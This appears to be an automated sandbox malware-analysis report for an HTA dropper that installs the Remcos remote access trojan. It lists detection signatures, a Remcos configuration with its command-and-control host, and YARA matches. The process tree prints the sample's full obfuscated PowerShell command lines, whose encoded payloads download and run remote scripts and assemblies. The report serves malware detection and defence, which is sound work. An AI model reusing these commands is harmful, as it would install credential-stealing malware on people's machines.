Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta

Overview

General Information

Sample name:seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
Analysis ID:1576455
MD5:80636733be5c6936770df78c2298d639
SHA1:0e9cd08975bff8b04e8e7671f13c2585c25796a5
SHA256:9c4e6335372584e7b1e145fe9ac1eeb43c148ac9b98337a4629b817badc83eec
Tags:htauser-lontze7
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 3608 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 3200 cmdline: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1776 cmdline: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 5748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 5924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 1776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["kiolokgangan.duckdns.org:2430:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H22KKM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x10c008:$a1: Remcos restarted by watchdog!
          • 0x10c580:$a3: %02i:%02i:%02i:%03i
          0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  12.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6b6f8:$a1: Remcos restarted by watchdog!
                  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                  12.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x65a04:$str_b2: Executing file:
                  • 0x6683c:$str_b3: GetDirectListeningPort
                  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x66380:$str_b7: \update.vbs
                  • 0x65a2c:$str_b9: Downloaded file:
                  • 0x65a18:$str_b10: Downloading file:
                  • 0x65abc:$str_b12: Failed to upload file:
                  • 0x66804:$str_b13: StartForward
                  • 0x66824:$str_b14: StopForward
                  • 0x662d8:$str_b15: fso.DeleteFile "
                  • 0x6626c:$str_b16: On Error Resume Next
                  • 0x66308:$str_b17: fso.DeleteFolder "
                  • 0x65aac:$str_b18: Uploaded file:
                  • 0x65a6c:$str_b19: Unable to delete:
                  • 0x662a0:$str_b20: while fso.FileExists("
                  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 20 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi32_5924.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi32_5924.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdH
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , ProcessId: 612, ProcessName: wscript.exe
